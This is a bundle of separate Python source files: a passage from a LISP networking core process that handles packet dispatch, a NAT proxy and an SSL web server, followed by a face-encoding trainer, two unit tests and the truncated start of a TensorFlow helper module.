return(info_source)
#endif
#endfor
return(None)
#endif
if (nonce != None):
if (nonce not in lisp.lisp_info_sources_by_nonce): return(None)
return(lisp.lisp_info_sources_by_nonce[nonce])
#endif
return(None)
#enddef
#
# lisp_nat_proxy_map_request
#
# Grab the nonce from the Map-Request, store it in the info-source data
# structure and modify the ITR-RLOCs field so the Map-Reply comes back to us.
#
def lisp_nat_proxy_map_request(lisp_sockets, info_source, packet):
#
# Parse and move packet pointer to beginning of Map-Request.
#
ecm = lisp.lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lisp.lprint("Could not decode ECM packet")
return(True)
#endif
header = lisp.lisp_control_header()
if (header.decode(packet) == None):
lisp.lprint("Could not decode control header")
return(True)
#endif
if (header.type != lisp.LISP_MAP_REQUEST):
lisp.lprint("Received ECM without Map-Request inside")
return(True)
#endif
#
# We are at the Map-Request header.
#
map_request = lisp.lisp_map_request()
packet = map_request.decode(packet, None, 0)
nonce = map_request.nonce
addr_str = info_source.address.print_address_no_iid()
#
# Print Map-Request again to show what has changed.
#
map_request.print_map_request()
lisp.lprint("Process {} from info-source {}, port {}, nonce 0x{}". \
format(lisp.bold("nat-proxy Map-Request", False),
lisp.red(addr_str, False), info_source.port,
lisp.lisp_hex_string(nonce)))
#
# Store nonce in info-source and cache in dictionary array. We will need
# to find it based on nonce when the Map-Reply is returned to us.
#
info_source.cache_nonce_for_info_source(nonce)
#
# Do not timeout Map-Requests that are subscription-requests. Because a
# Map-Notify can be triggered any time back to the requester.
#
info_source.no_timeout = map_request.subscribe_bit
#
# Check if we are already in ITR-RLOCs list. If so, this could be looping.
# Return so the Map-Request can be processed in the regular fashion (that
# is, send on DDT or to a Map-Resolver.
#
for itr_rloc in map_request.itr_rlocs:
if (itr_rloc.is_local()): return(False)
#endfor
#
# Store new ITR-RLOCs list.
#
myself = lisp.lisp_myrlocs[0]
map_request.itr_rloc_count = 0
map_request.itr_rlocs = []
map_request.itr_rlocs.append(myself)
packet = map_request.encode(None, 0)
map_request.print_map_request()
deid = map_request.target_eid
if (deid.is_ipv6()):
myself_v6 = lisp.lisp_myrlocs[1]
if (myself_v6 != None): myself = myself_v6
#endif
#
# Send ECM based Map-Request to Map-Resolver.
#
ms = lisp.lisp_is_running("lisp-ms")
lisp.lisp_send_ecm(lisp_sockets, packet, deid, lisp.LISP_CTRL_PORT,
deid, myself, to_ms=ms, ddt=False)
return(True)
#enddef
#
# lisp_nat_proxy_reply
#
# Grab the nonce from the Map-Request, store it in the info-source data
# structure and modify the ITR-RLOCs field so the Map-Reply/Notify comes
# back to us.
#
def lisp_nat_proxy_reply(lisp_sockets, info_source, packet, mr_or_mn):
addr_str = info_source.address.print_address_no_iid()
port = info_source.port
nonce = info_source.nonce
mr_or_mn = "Reply" if mr_or_mn else "Notify"
mr_or_mn = lisp.bold("nat-proxy Map-{}".format(mr_or_mn), False)
lisp.lprint("Forward {} to info-source {}, port {}, nonce 0x{}".format( \
mr_or_mn, lisp.red(addr_str, False), port,
lisp.lisp_hex_string(nonce)))
#
# Send on socket with arguments passed from IPC message.
#
dest = lisp.lisp_convert_4to6(addr_str)
lisp.lisp_send(lisp_sockets, dest, port, packet)
#enddef
#
# lisp_core_dispatch_packet
#
# Look at packet type and decide which process to send it to.
#
def lisp_core_dispatch_packet(lisp_sockets, source, sport, packet):
global lisp_ipc_socket
header = lisp.lisp_control_header()
if (header.decode(packet) == None):
lisp.lprint("Could not decode control header")
return
#endif
#
# In the lispers.net implementation any LISP system can process Info-
# Requests. We'll have the lisp-core process do this. lig/rig and the
# lisp-etr process sends Info-Requests messages. Since the lisp-core
# process processes Info-Requests, it responds with Info-Reply messages.
# And they are sent to the emphemeral port so go straight back to the lig/
# rig, or etr-processes.
#
if (header.type == lisp.LISP_NAT_INFO):
if (header.info_reply == False):
lisp.lisp_process_info_request(lisp_sockets, packet, source, sport,
lisp.lisp_ms_rtr_list)
#endif
return
#endif
local_packet = packet
packet = lisp.lisp_packet_ipc(packet, source, sport)
#
# Map-Registers, Echos, and Map-Notify-Acks go to the lisp-ms process.
#
if (header.type in (lisp.LISP_MAP_REGISTER, lisp.LISP_MAP_NOTIFY_ACK)):
lisp.lisp_ipc(packet, lisp_ipc_socket, "lisp-ms")
return
#endif
#
# Map-Reply messages go to ITRs.
#
if (header.type == lisp.LISP_MAP_REPLY):
map_reply = lisp.lisp_map_reply()
map_reply.decode(local_packet)
info_source = lisp_get_info_source(None, 0, map_reply.nonce)
if (info_source):
lisp_nat_proxy_reply(lisp_sockets, info_source, local_packet, True)
else:
lig = "/tmp/lisp-lig"
if (os.path.exists(lig)):
lisp.lisp_ipc(packet, lisp_ipc_socket, lig)
else:
lisp.lisp_ipc(packet, lisp_ipc_socket, "lisp-itr")
#endif
#endif
return
#endif
#
# Map-Notify messages go to ITRs.
#
if (header.type == lisp.LISP_MAP_NOTIFY):
map_notify = lisp.lisp_map_notify(lisp_sockets)
map_notify.decode(local_packet)
info_source = lisp_get_info_source(None, 0, map_notify.nonce)
if (info_source):
lisp_nat_proxy_reply(lisp_sockets, info_source, local_packet,
False)
else:
lig = "/tmp/lisp-lig"
if (os.path.exists(lig)):
lisp.lisp_ipc(packet, lisp_ipc_socket, lig)
else:
process = "lisp-rtr" if lisp.lisp_is_running("lisp-rtr") else \
"lisp-etr"
lisp.lisp_ipc(packet, lisp_ipc_socket, process)
#endif
#endif
return
#endif
#
# Map-Referral messages go to MRs. But if a rig client is running on
# this machine, IPC it to the client.
#
if (header.type == lisp.LISP_MAP_REFERRAL):
rig = "/tmp/lisp-rig"
if (os.path.exists(rig)):
lisp.lisp_ipc(packet, lisp_ipc_socket, rig)
else:
lisp.lisp_ipc(packet, lisp_ipc_socket, "lisp-mr")
#endif
return
#endif
#
# Map-Requests go to ETRs/RTRs when they RLOC-probes or SMR-invoked
# requests. And Map-Requests go to ITRs when they are SMRs.
#
if (header.type == lisp.LISP_MAP_REQUEST):
process = "lisp-itr" if (header.is_smr()) else "lisp-etr"
#
# RLOC-probes are received specifically by the process by pcaping
# on port 4342.
#
if (header.rloc_probe): return
lisp.lisp_ipc(packet, lisp_ipc_socket, process)
return
#endif
#
# ECMs can go to a lot of places. They are sent ITR->MR, LIG->MR, MR->DDT,
# MR->MS, and MS->ETR. If we find an Info-Request source, this core
# process will process the Map-Request so it can get the Map-Reply and
# forward to the translated address and port of a client behind a NAT.
#
if (header.type == lisp.LISP_ECM):
info_source = lisp_get_info_source(source, sport, None)
if (info_source):
if (lisp_nat_proxy_map_request(lisp_sockets, info_source,
local_packet)): return
#endif
process = "lisp-mr"
if (header.is_to_etr()):
process = "lisp-etr"
elif (header.is_to_ms()):
process = "lisp-ms"
elif (header.is_ddt()):
if (lisp.lisp_is_running("lisp-ddt")):
process = "lisp-ddt"
elif (lisp.lisp_is_running("lisp-ms")):
process = "lisp-ms"
#endif
elif (lisp.lisp_is_running("lisp-mr") == False):
process = "lisp-etr"
#endif
lisp.lisp_ipc(packet, lisp_ipc_socket, process)
#endif
return
#enddef
#
# lisp_ssl_server
#
# Setup cherrypy server that supports SSL connections. This is so we can
# protect passwords that flow over an http connection.
#
# Used the following to create private key and cert:
#
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
#
class lisp_ssl_server(bottle.ServerAdapter):
def run(self, hand):
cert = "./lisp-cert.pem"
#
# Use user provided lisp-cert.pem if it exists. Otherwise use the
# lispers.net default lisp-cert.pem.default file.
#
if (os.path.exists(cert) == False):
os.system("cp ./lisp-cert.pem.default {}".format(cert))
lisp.lprint(("{} does not exist, creating a copy from lisp-" + \
"cert.pem.default").format(cert))
#endif
server = wsgiserver.CherryPyWSGIServer((self.host, self.port), hand)
server.ssl_adapter = pyOpenSSLAdapter(cert, cert, None)
# context = SSL.Context(SSL.SSLv23_METHOD)
# server.ssl_adapter.context = context
try:
server.start()
finally:
server.stop()
#endtry
#enddef
#endclass
#
# lisp_bottle_ipv4_process
#
# Variable bottle_port can take on the following values:
#
# 8080 - run web server on port 8080 using SSL
# 443 - run web server on port 443 using SSL
# -8080 - run web server on port 8080 with no SSL (no secure connection).
#
# Any other port is accepted and used with SSL. If a "-" precedes it, it is
# used with no SSL.
#
def lisp_bottle_ipv4_process(bottle_port):
lisp.lisp_set_exception()
#
# No security. Usually for testing purposes or complexities installing
# OpenSSL.
#
if (bottle_port < 0):
bottle.run(host="0.0.0.0", port=-bottle_port)
return
#endif
bottle.server_names["lisp-ssl-server"] = lisp_ssl_server
#
# If you want to run without SSL, do this and comment out the above call.
#
try:
bottle.run(host="0.0.0.0", port=bottle_port, server="lisp-ssl-server",
fast=True)
except:
bottle.run(host="0.0.0.0", port=bottle_port, fast=True)
#endtry
return
#enddef
#
# lisp_bottle_ipv6_process
#
# Start HTTP server on port 8080. But bottle does not support IPv6 yet so
# we comment out the call.
#
def lisp_bottle_ipv6_process():
lisp.lisp_set_exception()
# run(host="0::0", port=8080)
return
#enddef
#
# lisp_check_processes
#
# Check to see if any component has gone down when it should be running. And
# if it comes up when it should be running, download the configuration commands
# it is responsible for.
#
def lisp_check_processes(lisp_socket):
lisp.lisp_set_exception()
status = {"lisp-itr" : False, "lisp-etr" : False, "lisp-rtr" : False,
"lisp-mr" : False, "lisp-ms" : False, "lisp-ddt" : False}
while (True):
time.sleep(1)
old_status = status
status = {}
for process in old_status:
status[process] = lisp.lisp_is_running(process)
if (old_status[process] == status[process]): continue
lisp.lprint("*** Process '{}' has {} ***".format(process,
"come up" if status[process] else "gone down"))
#
# If process has come up, send configuration commands.
#
if (status[process] == True):
lisp.lisp_ipc_lock.acquire()
lispconfig.lisp_send_commands(lisp_socket, process)
lisp.lisp_ipc_lock.release()
#endif
#endfor
#endwhile
return
#enddef
#
# lisp_timeout_info_sources
#
# Timeout info sources from lisp_info_source_list{}.
#
def lisp_timeout_info_sources():
lisp.lisp_set_exception()
timeout = 60
while (True):
time.sleep(timeout)
delete_list = []
now = lisp.lisp_get_timestamp()
#
# Find entries that are greater than 1 minute old.
#
for key in lisp.lisp_info_sources_by_address:
info_source = lisp.lisp_info_sources_by_address[key]
if (info_source.no_timeout): continue
if (info_source.uptime + timeout < now): continue
delete_list.append(key)
nonce = info_source.nonce
if (nonce == None): continue
if (nonce in lisp.lisp_info_sources_by_nonce):
lisp.lisp_info_sources_by_nonce.pop(nonce)
#endif
#endfor
#
# Go through delete list to remove from dictionary array.
#
for key in delete_list:
lisp.lisp_info_sources_by_address.pop(key)
#endfor
#endwhile
return
#enddef
#
# lisp_core_control_packet_process
#
# Listen for IPC messages from LISP componment processes. They want to send
# control packets out on the network from UDP port 4342.
#
def lisp_core_control_packet_process(lisp_ipc_control_socket, lisp_sockets):
lisp.lisp_set_exception()
while (True):
try: packet_data = lisp_ipc_control_socket.recvfrom(9000)
except: return(["", "", "", ""])
data = packet_data[0].split("@")
source = packet_data[1]
opcode = data[0]
dest = data[1]
port = int(data[2])
packet = data[3::]
if (len(packet) > 1):
packet = lisp.lisp_bit_stuff(packet)
else:
packet = packet[0]
#endif
if (opcode != "control-packet"):
lisp.lprint(("lisp_core_control_packet_process() received" + \
"unexpected control-packet, message ignored"))
continue
#endif
lisp.lprint(("{} {} bytes from {}, dest/port: {}/{}, control-" + \
"packet: {}").format(lisp.bold("Receive", False), len(packet),
source, dest, port, lisp.lisp_format_packet(packet)))
#
# Check if this is a Map-Reply to a ephem port and we have an
# Info-Source for the nonce in the Map-Reply. If so, call
# lisp_core_dispatch_packet().
#
header = lisp.lisp_control_header()
header.decode(packet)
if (header.type == lisp.LISP_MAP_REPLY):
map_reply = lisp.lisp_map_reply()
map_reply.decode(packet)
if (lisp_get_info_source(None, 0, map_reply.nonce)):
lisp_core_dispatch_packet(lisp_sockets, source, port, packet)
continue
#endif
#endif
#
# This is a Map-Notify that the lisp-etr process received and it
# has determined it is a (S,G) multicast Map-Notify that the lisp-itr
# process needs to process to update its map-cache.
#
if (header.type == lisp.LISP_MAP_NOTIFY and source == "lisp-etr"):
ipc = lisp.lisp_packet_ipc(packet, source, port)
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-itr")
continue
#endif
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
addr = lisp.lisp_convert_4to6(dest)
addr = lisp.lisp_address(lisp.LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(dest)): dest = "::ffff:" + dest
addr.store_address(dest)
#
# Send on socket with arguments passed from IPC message.
#
lisp.lisp_send(lisp_sockets, addr, port, packet)
#endwhile
return
#enddef
#
# lisp_cp_lisp_config
#
# The file ./lisp.config does not exist. Copy all commands from file
# lisp.config.example up to the dashed line.
#
def lisp_core_cp_lisp_config():
f = open("./lisp.config.example", "r"); lines = f.read(); f.close()
f = open("./lisp.config", "w")
lines = lines.split("\n")
for line in lines:
f.write(line + "\n")
if (line[0] == "#" and line[-1] == "#" and len(line) >= 4):
dashes = line[1:-2]
dash_check = len(dashes) * "-"
if (dashes == dash_check): break
#endif
#endfor
f.close()
return
#enddef
#
# lisp_core_startup
#
# Intialize this LISP core process. This function returns a LISP network
# listen socket.
#
def lisp_core_startup(bottle_port):
global lisp_build_date
global lisp_control_listen_socket
global lisp_ipc_socket
global lisp_ipc_control_socket
global lisp_sockets
global lisp_encap_socket
lisp.lisp_i_am("core")
lisp.lisp_set_exception()
lisp.lisp_print_banner("core-process starting up")
lisp.lisp_uptime = lisp.lisp_get_timestamp()
lisp.lisp_version = commands.getoutput("cat lisp-version.txt")
lisp_build_date = commands.getoutput("cat lisp-build-date.txt")
#
# Get local address for source RLOC for encapsulation.
#
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Only the core process uses a lock so it can send commands and show
# output in parallel to the component processes.
#
lisp.lisp_ipc_lock = multiprocessing.Lock()
#
# If this is a development build, put a plus after the version number.
# A development build is a build done from a directory that has the
# lisp.py file. Released builds built from the build directory will build
# only .pyo files.
#
if (os.path.exists("lisp.py")): lisp.lisp_version += "+"
#
# Open network socket to listen (and send) on port 4342. We may want
# a Map-Resolver to respond with a source-address of an anycast address
# so firewalls and NAT can return responses to ITRs or lig/rig clients.
#
address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
if (os.getenv("LISP_ANYCAST_MR") == None or lisp.lisp_myrlocs[0] == None):
lisp_control_listen_socket = lisp.lisp_open_listen_socket(address,
str(lisp.LISP_CTRL_PORT))
else:
address = lisp.lisp_myrlocs[0].print_address_no_iid()
lisp_control_listen_socket = lisp.lisp_open_listen_socket(address,
str(lisp.LISP_CTRL_PORT))
#endif
lisp.lprint("Listen on {}, port 4342".format(address))
#
# Open datagram socket for 4341. We will not listen on it. We just don't
# want the kernel to send port unreachables to ITRs and PITRs. If another
# data-plane is running, it may listen on the data port 4341. Let it.
#
if (lisp.lisp_external_data_plane() == False):
lisp_encap_socket = lisp.lisp_open_listen_socket(address,
str(lisp.LISP_DATA_PORT))
lisp.lprint("Listen on {}, port 4341".format(address))
#endif
#
# Open internal socket to send from to LISP components for configuration
# events.
#
lisp_ipc_socket = lisp.lisp_open_send_socket("lisp-core", "")
lisp_ipc_socket.settimeout(3)
#
# Open internal socket 'lisp-core-pkt' so LISP components can send
# control packets from UDP port 4342 via this lisp-core process.
#
lisp_ipc_control_socket = lisp.lisp_open_listen_socket("", "lisp-core-pkt")
lisp_sockets = [lisp_control_listen_socket, lisp_control_listen_socket,
lisp_ipc_socket]
#
# Start a thread to listen for control packet from LISP component
# processes.
#
threading.Thread(target=lisp_core_control_packet_process,
args=[lisp_ipc_control_socket, lisp_sockets]).start()
#
# Start a new thread to monitor configuration file changes. Do quick check
# to see if this is a first-time startup for the system. Check to see if
# lisp.config was not created by user.
#
if (os.path.exists("./lisp.config") == False):
lisp.lprint(("./lisp.config does not exist, creating a copy " + \
"from lisp.config.example"))
lisp_core_cp_lisp_config()
#endif
#
# Check if we are a map-server listening on a multicast group. This
# is a decentralized-push-xtr with a multicast map-server address.
#
lisp_check_decent_xtr_multicast(lisp_control_listen_socket)
threading.Thread(target=lispconfig.lisp_config_process,
args=[lisp_ipc_socket]).start()
#
# Start a new thread to run bottle for each address-family.
#
threading.Thread(target=lisp_bottle_ipv4_process,
args=[bottle_port]).start()
threading.Thread(target=lisp_bottle_ipv6_process, args=[]).start()
#
# Start a new thread to run LISP component health check.
#
threading.Thread(target=lisp_check_processes,
args=[lisp_ipc_socket]).start()
#
# Start a new thread to run LISP component health check.
#
threading.Thread(target=lisp_timeout_info_sources).start()
return(True)
#enddef
#
# lisp_core_shutdown
#
# Shutdown process.
#
def lisp_core_shutdown():
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_ipc_socket, "lisp-core")
lisp.lisp_close_socket(lisp_ipc_control_socket, "lisp-core-pkt")
lisp.lisp_close_socket(lisp_control_listen_socket, "")
lisp.lisp_close_socket(lisp_encap_socket, "")
return
#enddef
#
# lisp_check_decent_xtr_multicast
#
# Check to see if "decentralized-push-xtr = yes" and if any map-server clause
# has a multicast address configured. If so, setsockopt so we can receive
# multicast Map-Register messages.
#
# This function is robust enough for when a user copies lisp.config.example
# into lisp.config. We have to ignore text after "#- ... -#".
#
def lisp_check_decent_xtr_multicast(lisp_socket):
f = open("./lisp.config", "r"); lines = f.read(); f.close()
lines = lines.split("\n")
#
# Check if "decentralized-push-xtr = yes" is in the "lisp xtr-parameters"
# command clause.
#
decent_xtr = False
for line in lines:
if (line[0:1] == "#-" and line[-2:-1] == "-#"): break
if (line == "" or line[0] == "#"): continue
if (line.find("decentralized-push-xtr = yes") == -1): continue
decent_xtr = True
break
#endfor
if (decent_xtr == False): return
#
# Check if "lisp map-server" command clauses have multicast addresses
# configured.
#
groups = []
in_clause = False
for line in lines:
if (line[0:1] == "#-" and line[-2:-1] == "-#"): break
if (line == "" or line[0] == "#"): continue
if (line.find("lisp map-server") != -1):
in_clause = True
continue
#endif
if (line[0] == "}"):
in_clause = False
continue
#endif
#
# Parse address. Look at high-order byte.
#
if (in_clause and line.find("address = ") != -1):
group = line.split("address = ")[1]
ho_byte = int(group.split(".")[0])
if (ho_byte >= 224 and ho_byte < 240): groups.append(group)
#endif
#endfor
if (group == []): return
#
# Find eth0 IP address.
#
out = commands.getoutput('ifconfig eth0 | egrep "inet "')
if (out == ""): return
intf_addr = out.split()[1]
#
# Set socket options on socket.
#
i = socket.inet_aton(intf_addr)
for group in groups:
lisp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
lisp_socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, i)
g = socket.inet_aton(group) + i
lisp_socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, g)
lisp.lprint("Setting multicast listen socket for group {}".format( \
group))
#endfor
return
#enddef
#------------------------------------------------------------------------------
bottle_port = int(sys.argv[1]) if (len(sys.argv) > 1) else 8080
#
# Main entry point for process.
#
if (lisp_core_startup(bottle_port) == False):
lisp.lprint("lisp_core_startup() failed")
lisp.lisp_print_banner("lisp-core abnormal exit")
exit(1)
#endif
while (True):
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket..
#
opcode, source, port, packet = \
lisp.lisp_receive(lisp_control_listen_socket, False)
if (source == ""): break
#
# Process received network packet.
#
source = lisp.lisp_convert_6to4(source)
lisp_core_dispatch_packet(lisp_sockets, source, port, packet)
#endwhile
lisp_core_shutdown()
lisp.lisp_print_banner("lisp-core normal exit")
exit(0)
#------------------------------------------------------------------------------
|
trainer.py
|
"""
This class watches for updated encodings .pickle file from from retraining
process and loads the new encodings.
"""
import os
import sys
import time
import threading
import pickle
import numpy
import logging
import multiprocessing as mp
from imutils import paths as imutils_paths
from functools import partial
from ai_service.retrain_model import train_image
from ai_service import paths
# number of retrain processes to launch
NUM_PROCS = 2
logger = logging.getLogger(__name__)
def default_encodings_data():
return {'encodings': [], 'names': [], 'image_paths': []}
class Trainer:
thread = None # background thread that reads faces detected
times_read = 0
started_at = 0
# default initial encodings data in case a client calls
# get_encodings_data() before the pickle finishes loading
# on startup
encodings_data = default_encodings_data()
# used to prompt the trainer thread to run _retrain_model()
retrain_needed_event = threading.Event()
# used by stats()
# time it took to run retrain_model.py in seconds
last_retrain_duration = 0
# time it took to load the encodings from the pickle
last_load_duration = 0
# number of images last retrain
last_num_retrained = 0
# multiprocessing worker pool and queue allocated at thread start
pool = None
result_queue = None
def __init__(self):
if Trainer.thread is None:
Trainer.thread = threading.Thread(target=self._thread)
Trainer.thread.start()
# Returns the last encoding data without waiting for any
# retraining in progress
def get_encodings_data(self):
return Trainer.encodings_data
# After new data/faces/face-n dirs are added, this method
# is called. When the event is set, the trainer thread
# is either sleeping waiting on the event or currently
# retraining.
#
# It doesn't matter how far ahead or how many times this
# is called while the trainer is training. When retraining
# completes the trainer thread will immediately return from
# event.wait and retrain again.
#
# There is a possibility that the trainer will get a partial
# set of frames for a face since the Engagement thread is
# possibly copying files to a face dir, but that should just make
# for one or two weak / lower confidence face encodings which
# will self correct on the next iteration of retrain_model()
def trigger_retrain(self):
Trainer.retrain_needed_event.set()
def trigger_retrain_all(self):
Trainer.encodings_data = default_encodings_data()
self.trigger_retrain()
@classmethod
def stats(cls):
fps = 0
if cls.last_retrain_duration > 0:
fps = cls.last_num_retrained / cls.last_retrain_duration
return {
"lastLoad": {
"duration": cls.last_load_duration,
},
"lastRetrain": {
"duration": cls.last_retrain_duration,
"count": cls.last_num_retrained,
"fps": fps
},
"totals": {
"encodings": len(cls.encodings_data['encodings']),
"uniqueFaces": len(numpy.unique(numpy.array(cls.encodings_data['names']))),
"uniqueFiles": len(numpy.unique(numpy.array(cls.encodings_data['image_paths']))),
}
}
@classmethod
def _thread(cls):
logger.info('Starting trainer thread.')
cls.started_at = time.time()
# In case a retrain request comes in while loading...
cls.retrain_needed_event.clear()
cls._load_encodings_from_file()
cls.pool = mp.Pool(processes=NUM_PROCS)
cls.result_queue = mp.Manager().Queue()
while True:
cls.retrain_needed_event.wait()
cls.retrain_needed_event.clear()
cls._retrain_model()
time.sleep(0)
@classmethod
def _load_encodings_from_file(cls):
if os.path.exists(paths.ENCODINGS_FILE_PATH):
time_started = time.time()
cls.last_modified = os.path.getmtime(paths.ENCODINGS_FILE_PATH)
new_encodings_data = pickle.loads(
open(paths.ENCODINGS_FILE_PATH, "rb").read(), encoding='latin1')
cls.times_read += 1
cls.encodings_data = new_encodings_data
cls.last_load_duration = time.time() - time_started
logger.info(
f"Trainer updated from {paths.ENCODINGS_FILE_PATH} in {cls.last_load_duration}s")
logger.info(
f"loaded {len(cls.encodings_data['encodings'])} encodings, {len(cls.encodings_data['names'])} names, and {len(cls.encodings_data['image_paths'])} image paths")
@classmethod
def _save_encodings_to_file(cls):
logger.info(
f"saving {len(cls.encodings_data['encodings'])} encodings, {len(cls.encodings_data['names'])} names, and {len(cls.encodings_data['image_paths'])} image paths")
with open(paths.ENCODINGS_FILE_PATH, 'wb') as fp:
pickle.dump(cls.encodings_data, fp,
protocol=pickle.HIGHEST_PROTOCOL)
@classmethod
def _find_untrained_file_paths(cls):
image_paths = list(imutils_paths.list_images(paths.FACES_DATA_DIR))
processed_paths = cls.encodings_data['image_paths']
untrained_paths = [
value for value in image_paths if value not in processed_paths]
untrained_paths.sort()
return untrained_paths
@classmethod
def _handle_retrain_result(cls, result):
if not result:
return
logger.info(
f"got result from queue with {len(result['encodings'])} encodings for {result['name']} at {result['image_path']}")
if len(result['encodings']) == 0:
cls.encodings_data['image_paths'].append(result['image_path'])
else:
for encoding in result['encodings']:
cls.encodings_data['encodings'].append(encoding)
cls.encodings_data['names'].append(result['name'])
cls.encodings_data['image_paths'].append(
result['image_path'])
@classmethod
def _retrain_model(cls):
time_started = time.time()
# calling the retrain_model function directly from
# this thread and process caused a seg fault.
# I suspect that calling face_locations() and
# face_encodings() from face_recognition package
# are not thread safe.
#
# See comment on this commit:
# https://github.com/littlebee/shelly-bot/commit/1d18f1d26bdc0912bafb0fb7a3e480f88026a29d
# dir_path = os.path.dirname(os.path.realpath(__file__))
# os.system(f"python3 {dir_path}/retrain_model.py")
untrained_file_paths = cls._find_untrained_file_paths()
num_untrained = len(untrained_file_paths)
logger.info(f"found {num_untrained} untrained paths")
# prod_x has only one argument x (y is fixed to 10)
train_image_partial = partial(train_image, queue=cls.result_queue)
async_map = cls.pool.map_async(
train_image_partial, untrained_file_paths)
while not async_map.ready():
result = None
try:
result = cls.result_queue.get(True, .25)
except:
pass
cls._handle_retrain_result(result)
while not cls.result_queue.empty():
cls._handle_retrain_result(cls.result_queue.get())
cls.last_retrain_duration = time.time() - time_started
cls.last_num_retrained = num_untrained
last_retrain_fps = num_untrained / cls.last_retrain_duration
logger.info(
f"retraining complete. duration={cls.last_retrain_duration} fps={last_retrain_fps} ")
cls._save_encodings_to_file()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test blinkhashd shutdown."""
from test_framework.test_framework import BlinkhashTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BlinkhashTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
test_fleet_private_function.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import os
import paddle
import socket
import threading
class TestFleetPrivateFunction(unittest.TestCase):
def test_wait_port(self):
def init_server(port):
import time
time.sleep(5)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("127.0.0.1", port))
sock.listen(10)
while True:
c, addr = sock.accept()
c.send("0")
c.close()
break
thr = threading.Thread(target=init_server, args=(9292, ))
thr.start()
import paddle.distributed.fleet as fleet
ep = ["127.0.0.1:9292"]
fleet.base.private_helper_function.wait_server_ready(ep)
thr.join()
if __name__ == "__main__":
unittest.main()
|
core.py
|
from __future__ import print_function
import tensorflow as tf
import numpy as np
import uuid
from scipy import linalg
from scipy.stats import truncnorm
from scipy.misc import factorial
import tensorflow as tf
import shutil
import socket
import os
import re
import copy
import sys
import time
import logging
from collections import OrderedDict
import hashlib
import json
import zipfile
import glob
import threading
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
try:
import Queue
except ImportError:
import queue as Queue
try:
import urllib.request as urllib # for backwards compatibility
except ImportError:
import urllib2 as urllib
logging.basicConfig(level=logging.INFO,
format='%(message)s')
logger = logging.getLogger(__name__)
string_f = StringIO()
ch = logging.StreamHandler(string_f)
# Automatically put the HTML break characters on there for html logger
formatter = logging.Formatter('%(message)s<br>')
ch.setFormatter(formatter)
logger.addHandler(ch)
def get_logger():
return logger
sys.setrecursionlimit(40000)
# Storage of internal shared
_lib_shared_params = OrderedDict()
def _get_name():
return str(uuid.uuid4())
def _get_shared(name):
if name in _lib_shared_params.keys():
logger.info("Found name %s in shared parameters" % name)
return _lib_shared_params[name]
else:
raise NameError("Name not found in shared params!")
def _set_shared(name, variable):
if name in _lib_shared_params.keys():
raise ValueError("Trying to set key %s which already exists!" % name)
_lib_shared_params[name] = variable
def get_params_dict():
return _lib_shared_params
weight_norm_default = False
def get_weight_norm_default():
return weight_norm_default
strict_mode_default = False
def get_strict_mode_default():
return strict_mode_default
def print_network(params_dict):
logger.info("=====================")
logger.info("Model Summary")
logger.info("format: {name} {shape}, {parameter_count}")
logger.info("---------------------")
for k, v in params_dict.items():
#strip_name = "_".join(k.split("_")[1:])
strip_name = k
shp = tuple(_shape(v))
k_count = np.prod(shp) / float(1E3)
logger.info("{} {}, {}K".format(strip_name, shp, k_count))
params = params_dict.values()
n_params = sum([np.prod(_shape(p)) for p in params])
logger.info("---------------------")
logger.info(" ")
logger.info("Total: {}M".format(n_params / float(1E6)))
logger.info("=====================")
def _shape(x):
r = x.get_shape().as_list()
r = [ri if ri != None else -1 for ri in r]
#if len([ri for ri in r if ri == -1]) > 1:
# raise ValueError("Too many None shapes in shape dim {}, should only 1 -1 dim at most".format(r))
return r
def _ndim(x):
return len(_shape(x))
def dot(a, b):
# Generalized dot for nd sequences, assumes last axis is projection
# b must be rank 2
a_tup = _shape(a)
b_tup = _shape(b)
if len(a_tup) == 2 and len(b_tup) == 2:
return tf.matmul(a, b)
elif len(a_tup) == 3 and len(b_tup) == 2:
# more generic, supports multiple -1 axes
return tf.einsum("ijk,kl->ijl", a, b)
#a_i = tf.reshape(a, [-1, a_tup[-1]])
#a_n = tf.matmul(a_i, b)
#a_nf = tf.reshape(a_n, list(a_tup[:-1]) + [b_tup[-1]])
#return a_nf
else:
